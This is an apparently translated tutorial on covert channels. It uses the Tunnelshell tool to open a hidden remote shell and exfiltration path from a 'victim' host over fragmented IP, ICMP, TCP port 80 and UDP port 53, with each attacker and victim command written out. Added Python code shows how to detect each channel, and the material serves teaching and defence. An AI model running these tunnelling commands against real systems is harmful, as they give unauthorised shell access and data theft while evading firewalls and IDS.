2025-01-17 Update From: SLTechnology News&Howtos (shulou), Development
Shulou (Shulou.com) 06/02 Report
This article shows how data can be pulled from a target host over a covert channel. The walkthrough is concise and easy to follow; I hope you learn something from it.
What is a Covert Channel?
The word covert means "hidden or undetectable" and a channel is a "mode of communication", so a covert channel is a communication path that goes undetected. It is important to understand the difference between encrypted and covert communication. In covert communication, the data stream itself is disguised so that an unauthorized party can keep it flowing unnoticed. Encrypted communication, by contrast, protects the data transmitted between two endpoints but does not hide the fact that communication is taking place.
Types of Covert Channel
Network covert storage channel: the sender directly or indirectly writes a target value, and the receiver directly or indirectly reads it.
Network covert timing channel: the sender modulates a resource (e.g. CPU) in the time domain to transmit information, and the receiver observes the modulation and decodes it.
Compared with a storage covert channel, a timing covert channel is also called a memoryless channel: it cannot store information for long, so the sender's message must be received promptly or it is lost.
Covert Channel Attacks Using Tunnelshell
Almost any protocol can be used to establish a covert channel. Most covert channel studies are based on Layer 3 (network) and Layer 4 (transport) protocols such as ICMP, IP and TCP; Layer 7 (application) protocols such as HTTP and DNS are also frequently used. The mechanism transmits information without alerting network firewalls and IDS, and netstat does not show it.
Introduction to Tunnelshell
Tunnelshell is a program written in C for Linux that uses the client-server paradigm. The server opens /bin/sh, which the client accesses through a virtual tunnel. It supports multiple protocols, including TCP, UDP, ICMP and RawIP. In addition, packets can be fragmented to avoid detection by firewalls and IDS.
Experimental environment
Server (Kali Linux)
Client (Ubuntu 18.04)
Tunnelshell
Here, assume that we have already established a session with the victim machine via the C2 server. Now we need a hidden channel for exfiltrating data, so tunnelshell has to be installed on both endpoints.
After downloading, extract the file and compile it as follows:
tar xvfz tunnelshell_2.3.tgz
make
Repeat the same steps on the other endpoint (the victim's machine). When that is done, execute the following command in the terminal to open the server side of the channel (Attacker).
sudo ./tunneld
By default, it sends segmented packets that reassemble at the destination endpoint to avoid firewalls and IDS.
Now, to connect with tunnelshell, execute the following command on the server (attacker's machine); this establishes the covert channel used for data exfiltration.
Syntax: ./tunnel -i -d -s -t -o -p -m -a
./tunnel -t frag 10.10.10.2
frag: encapsulates the data in IPv4 fragmented packets. Certain routers and firewalls, such as Cisco routers and default Linux installations, let fragmented Layer 4 packets that arrive without a header pass through even though they have rules to deny them. As you can see, it has successfully connected to 10.10.10.2, and we have access to the victim machine's shell.
As I said, if you use netstat to check connection status, you will not see any process ID for tunnelshell. As you can see in the figure below, I checked tunnelshell's process with the ps command and then tried to find its process ID via netstat.
ps | grep tunneld
netstat -ano
Let's look at 10.10.10.1 (the attacker's IP) and 10.10.10.2 (the victim's IP). The network flow looks like normal traffic between two endpoints, but if it is monitored correctly, a network administrator can sniff the packets. As you can see, Wireshark captures the covert traffic and shows the data being transmitted between the two endpoints.
Covert ICMP channel
We know that ping uses ICMP to communicate between two hosts by sending ICMP echo request packets and receiving ICMP echo reply packets. Therefore, execute the following command:
sudo ./tunneld -t icmp -m echo-reply,echo
Now, to connect with tunnelshell, execute the following command on the server (attacker's machine); this establishes the covert channel used for data exfiltration.
./tunnel -t icmp -m echo-reply,echo 10.10.10.2
As you can see, it has successfully connected to 10.10.10.2, and the attacker is able to access the victim computer's shell.
Similarly, if you capture the traffic with Wireshark, you will notice ICMP echo request and reply packets travelling between the two endpoints. If you analyze these packets, you can see what payload is being carried as ICMP data.
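One way a defender can verify the observation above, as an added example that is not part of the original article or of tunnelshell: the Python below parses raw ICMP echo messages, verifies the RFC 1071 checksum, compares the payload with the padding stock ping tools emit, and checks that a reply mirrors its request. The sample packets are constructed here; the Linux and Windows padding patterns are those tools' well-known defaults.

```python
import struct
# Padding the stock ping tools place after the ICMP header (their well-known defaults):
# Linux ping sends an 8-byte timestamp followed by 0x10, 0x11, ...; Windows ping sends a..w repeating.
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvw"

def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Build an echo request (type 8) or reply (type 0) with a valid checksum; used for sample data."""
    hdr = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    return struct.pack("!BBHHH", icmp_type, 0, icmp_checksum(hdr + payload), ident, seq) + payload

def looks_like_ping_padding(payload: bytes) -> bool:
    """True when the payload is the stock Linux or Windows ping pattern."""
    linux = bytes((0x10 + i) & 0xFF for i in range(max(len(payload) - 8, 0)))
    windows = (WINDOWS_PATTERN * (len(payload) // len(WINDOWS_PATTERN) + 1))[:len(payload)]
    return payload[8:] == linux or payload == windows

def inspect_echo(msg: bytes) -> list:
    """Findings for one ICMP message; an empty list means it looks like ordinary ping."""
    if len(msg) < 8:
        return ["truncated"]
    icmp_type, code, cksum, _ident, _seq = struct.unpack("!BBHHH", msg[:8])
    payload = msg[8:]
    findings = []
    if icmp_type not in (0, 8) or code != 0:
        findings.append("not-echo")
    if icmp_checksum(msg[:2] + b"\x00\x00" + msg[4:]) != cksum:
        findings.append("bad-checksum")
    if not looks_like_ping_padding(payload):
        findings.append("payload-not-ping-padding")
        # Shell output riding inside ICMP data shows up as a run of printable text.
        if payload and all(32 <= b < 127 or b in (9, 10, 13) for b in payload):
            findings.append("printable-text-payload")
    return findings

def reply_mirrors_request(request: bytes, reply: bytes) -> bool:
    """A genuine echo reply repeats the request's id, seq and payload unchanged."""
    return request[4:] == reply[4:]

# Constructed samples: a stock Linux ping request and a tunnelshell-style reply carrying command output.
STOCK_PING = build_echo(8, 0x1234, 1, bytes(8) + bytes(range(0x10, 0x40)))
COVERT_REPLY = build_echo(0, 0x1234, 1, b"uid=0(root) gid=0(root) groups=0(root)\n")
```

Pairing requests with replies by id and seq and comparing payloads catches the tunnel even when the attacker pads the data to look like ping, because the reply no longer echoes the request.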
Covert HTTP Channel
Tunnelshell establishes a virtual TCP connection without a three-way handshake and binds no port, so you can reuse a port already in use by another process. Execute the following command:
sudo ./tunneld -t tcp -p 80,2000
Now, to connect with tunnelshell, execute the following command on the server (attacker's machine); this establishes the covert channel used for data exfiltration.
./tunnel -t tcp -p 80,2000 10.10.10.2
As you can see, it has successfully connected to 10.10.10.2, and the attacker was again able to access the victim computer's shell.
In the network traffic you can see TCP communication between source and destination, but no real three-way handshake.
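The missing handshake noted above can be turned into a detection rule. This added example (not part of the original article) tracks per-flow TCP state over constructed packet records and reports flows that carried payload without a SYN / SYN-ACK / ACK exchange; the packet records and port numbers are constructed samples, not captured data.

```python
from collections import defaultdict

def pkt(src, sport, dst, dport, flags, length):
    """One captured TCP segment; flags is a comma-separated list such as 'PSH,ACK'."""
    return {"src": src, "sport": sport, "dst": dst, "dport": dport, "flags": flags, "len": length}

def flow_key(p):
    """Direction-independent 4-tuple so both halves of a conversation share one state record."""
    a, b = (p["src"], p["sport"]), (p["dst"], p["dport"])
    return (a, b) if a < b else (b, a)

def find_handshakeless_data(packets):
    """Map each flow to the payload bytes it carried before a SYN / SYN-ACK / ACK exchange completed.

    Flows that were already open when the capture began are reported too, so start the
    capture before the suspect traffic or exclude known long-lived connections.
    """
    state = defaultdict(lambda: {"syn": False, "synack": False, "open": False, "data": 0})
    for p in packets:
        st = state[flow_key(p)]
        flags = set(p["flags"].split(","))
        if flags == {"SYN"}:
            st["syn"] = True
        elif flags == {"SYN", "ACK"} and st["syn"]:
            st["synack"] = True
        elif "ACK" in flags and st["synack"]:
            st["open"] = True  # third step of the handshake, possibly already carrying data
        if p["len"] > 0 and not st["open"]:
            st["data"] += p["len"]
    return {k: v["data"] for k, v in state.items() if v["data"]}

# Constructed capture: a real HTTP exchange with a handshake, then tunnelshell-style segments
# on port 80 with no handshake at all (ports chosen to mirror "-p 80,2000"; sample data only).
NORMAL_HTTP = [
    pkt("10.10.10.1", 40000, "10.10.10.2", 80, "SYN", 0),
    pkt("10.10.10.2", 80, "10.10.10.1", 40000, "SYN,ACK", 0),
    pkt("10.10.10.1", 40000, "10.10.10.2", 80, "ACK", 0),
    pkt("10.10.10.1", 40000, "10.10.10.2", 80, "PSH,ACK", 120),
    pkt("10.10.10.2", 80, "10.10.10.1", 40000, "PSH,ACK", 512),
]
COVERT_TCP = [
    pkt("10.10.10.1", 2000, "10.10.10.2", 80, "PSH,ACK", 40),
    pkt("10.10.10.2", 80, "10.10.10.1", 2000, "PSH,ACK", 200),
]
```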
Covert DNS channel
To establish a DNS covert channel, we need to run UDP tunneling mode on both endpoint machines. On the victim's machine, execute the following command:
sudo ./tunneld -t udp -p 53,2000
Then execute the following command on your (attacker) machine to connect the tunnel.
./tunnel -t udp -p 53,2000 10.10.10.2
As you can see, the DNS error packets contain the data transmitted between the two endpoint machines.
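The "DNS error packets" Wireshark shows are datagrams on UDP/53 that do not decode as DNS. As an added example (not from the original article), the Python below applies the same sanity checks to a UDP/53 payload: header length, opcode and Z bit, question count, and label lengths in the question name. The two sample datagrams are constructed.

```python
import struct

def parse_qname(buf: bytes, off: int):
    """Walk the label sequence starting at off; return (name, next_off) or raise ValueError."""
    labels = []
    while True:
        if off >= len(buf):
            raise ValueError("name runs past end of message")
        length = buf[off]
        off += 1
        if length == 0:
            break
        if (length & 0xC0) == 0xC0:  # compression pointer occupies 2 bytes and ends the name
            labels.append("<ptr>")
            off += 1
            break
        if length > 63 or off + length > len(buf):
            raise ValueError("bad label length %d" % length)
        labels.append(buf[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), off

def check_dns_payload(payload: bytes) -> list:
    """Findings for one UDP/53 datagram; an empty list means it decodes as a plausible DNS message."""
    if len(payload) < 12:
        return ["shorter-than-dns-header"]
    _ident, flags, qd, _an, _ns, _ar = struct.unpack("!HHHHHH", payload[:12])
    findings = []
    if ((flags >> 11) & 0xF) > 5:  # opcodes 6-15 are unassigned
        findings.append("reserved-opcode")
    if flags & 0x0040:  # the Z bit must be zero
        findings.append("z-bit-set")
    if qd != 1:  # ordinary queries and their answers carry exactly one question
        findings.append("qdcount-%d" % qd)
    off = 12
    try:
        for _ in range(qd):
            _, off = parse_qname(payload, off)
            if off + 4 > len(payload):
                raise ValueError("question truncated")
            off += 4  # skip QTYPE and QCLASS
    except ValueError as exc:
        findings.append("malformed: %s" % exc)
    return findings

# Constructed samples: a well-formed A query for example.com, and a tunnelshell-style datagram
# sent to port 53 whose bytes are nothing but command output.
DNS_QUERY = struct.pack("!HHHHHH", 0x1A2B, 0x0100, 1, 0, 0, 0) + b"\x07example\x03com\x00" + struct.pack("!HH", 1, 1)
COVERT_UDP53 = b"uid=0(root) gid=0(root) groups=0(root)\n"
```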
Covert channels built this way do not encrypt the packets carrying the exfiltrated data, so they are easily sniffed, and network administrators can readily apply data loss prevention and risk management to them.
That is how data is taken from a target host via a covert channel.